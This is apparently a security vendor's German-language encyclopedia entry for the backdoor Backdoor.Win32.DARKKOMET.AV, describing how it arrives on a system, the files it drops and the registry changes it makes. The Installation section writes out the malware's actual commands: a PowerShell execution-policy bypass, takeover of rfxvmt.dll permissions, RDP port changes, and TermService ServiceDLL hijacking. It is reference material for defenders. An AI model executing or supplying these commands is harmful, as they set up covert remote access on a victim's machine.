Backdoor.Win32.DARKKOMET.AV

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Löscht Dateien, so dass Programme und Anwendungen nicht ordnungsgemäß ausgeführt werden.

Übertragungsdetails

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

Fügt die folgenden Prozesse hinzu:

• "%System%\cmd.exe" /c timeout -n 7&del $EXEPATH /f
• "%System%\cmd.exe" /c timeout -t 15& powershell -ep bypass -f %User Temp%\shortcuts.ps1
• timeout -n 7
• timeout -t 15
• powershell -ep bypass -f %User Temp%\shortcuts.ps1
• "%System%\takeown.exe" /A /F rfxvmt.dll
• "%System%\icacls.exe" rfxvmt.dll /inheritance:d
• "%System%\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
• "%System%\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
• "%System%\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
• "%System%\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
• "%System%\icacls.exe" rfxvmt.dll /remove BUILTIN\{username}s
• "%System%\icacls.exe" rfxvmt.dll /grant BUILTIN\{username}s:RX
• "%System%\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
• "%System%\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d "%System Root%\program files\windows mail\appcache.xml" /f
• "%System%\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
• "%System%\net.exe" localgroup "NT AUTHORITY\NETWORK SERVICE" /add
• "%System%\cmd.exe" /c cmd /c net start rdpdr
• "%System%\cmd.exe" /c cmd /c net start TermService
• "%System%\cmd.exe" /c del %temp%\*.ps1 /f
• "%System%\cmd.exe" /c del %temp%\*.txt /f
• %System%\svchost.exe -k netsvcs
• %System%\net1 localgroup "NT AUTHORITY\NETWORK SERVICE" /add
• %System%\net1 start rdpdr
• %System%\net1 start TermService

(Hinweis: %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).. %User Temp% ist der Ordner 'Temp' des aktuellen Benutzers, normalerweise C:\Dokumente und Einstellungen\{Benutzername}\Lokale Einstellungen\Temp unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\AppData\Local\Temp unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).. %System Root% ist der Stammordner, normalerweise C:\. Dort befindet sich auch das Betriebssystem.)

Erstellt die folgenden Ordner:

• %User Profile%\AppData
• %System Root%\Users

(Hinweis: %User Profile% ist der Ordner für Benutzerprofile des aktuellen Benutzers, normalerweise C:\Windows\Profile\{Benutzername} unter Windows 98 und ME, C:\WINNT\Profile\{Benutzername} unter Windows NT, C:\Dokumente und Einstellungen\{Benutzername} unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{user name} unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).. %System Root% ist der Stammordner, normalerweise C:\. Dort befindet sich auch das Betriebssystem.)

Andere Systemänderungen

Löscht die folgenden Dateien:

• %User Temp%\dd_vcredistUI0FC1.txt
• %User Temp%\Microsoft .NET Framework 4.5.2 Setup_20161212_135033207-MSI_netfx_Full_GDR_x64.msi.txt
• %User Temp%\dd_vcredistUI0FD5.txt
• %User Temp%\dd_wcf_CA_smci_20161212_135109_353.txt
• %User Temp%\dd_wcf_CA_smci_20161212_135110_351.txt
• %User Temp%\dd_vcredistMSI0FC1.txt
• %User Temp%\dd_SetupUtility.txt
• %User Temp%\dd_vcredistMSI0FD5.txt
• %User Temp%\dd_NDP452-KB2901907-x86-x64-AllOS-ENU_decompression_log.txt
• %User Temp%\FXSAPIDebugLogFile.txt

(Hinweis: %User Temp% ist der Ordner 'Temp' des aktuellen Benutzers, normalerweise C:\Dokumente und Einstellungen\{Benutzername}\Lokale Einstellungen\Temp unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\AppData\Local\Temp unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).)

Löscht die folgenden Ordner:

• %User Temp%\nskA7E3.tmp

(Hinweis: %User Temp% ist der Ordner 'Temp' des aktuellen Benutzers, normalerweise C:\Dokumente und Einstellungen\{Benutzername}\Lokale Einstellungen\Temp unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\AppData\Local\Temp unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).)

Fügt die folgenden Registrierungseinträge hinzu:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\Windows NT\Terminal Services
fEnableWddmDriver = "0"

Ändert die folgenden Registrierungseinträge:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
Control\Terminal Server\WinStations\
RDP-Tcp
PortNumber = "7201"

(Note: The default value data of the said registry entry is d3d.)

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\TermService\Parameters
ServiceDLL = "%System Root%\program files\windows mail\appcache.xml"

(Note: The default value data of the said registry entry is {random values}.)

Einschleusungsroutine

Schleust die folgenden Dateien ein:

• %System Root%\Program Files\windows mail\cleanuptask.cfg
• %Windows%\Temp\usrnm.txt
• %User Temp%\shortcuts.ps1
• %System Root%\Program Files\windows mail\default_list.xml
• %System Root%\Program Files\windows mail\appcache.xml

(Hinweis: %System Root% ist der Stammordner, normalerweise C:\. Dort befindet sich auch das Betriebssystem.. %Windows% ist der Windows Ordner, normalerweise C:\Windows oder C:\WINNT.. %User Temp% ist der Ordner 'Temp' des aktuellen Benutzers, normalerweise C:\Dokumente und Einstellungen\{Benutzername}\Lokale Einstellungen\Temp unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\AppData\Local\Temp unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).)

Andere Details

It connects to the following possibly malicious URL:

• http://www.{BLOCKED}oft.com/pki/certs/MicRooCerAut_2010-06-23.crt